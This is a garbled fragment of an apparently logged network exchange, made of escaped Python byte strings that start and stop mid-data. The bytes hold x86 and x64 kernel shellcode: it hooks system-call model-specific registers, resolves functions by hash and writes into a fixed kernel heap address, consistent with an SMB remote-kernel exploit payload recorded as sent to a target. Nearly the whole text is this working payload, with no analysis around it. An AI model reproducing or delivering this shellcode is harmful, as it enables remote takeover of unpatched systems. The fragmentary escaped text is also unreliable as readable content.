\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 8, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\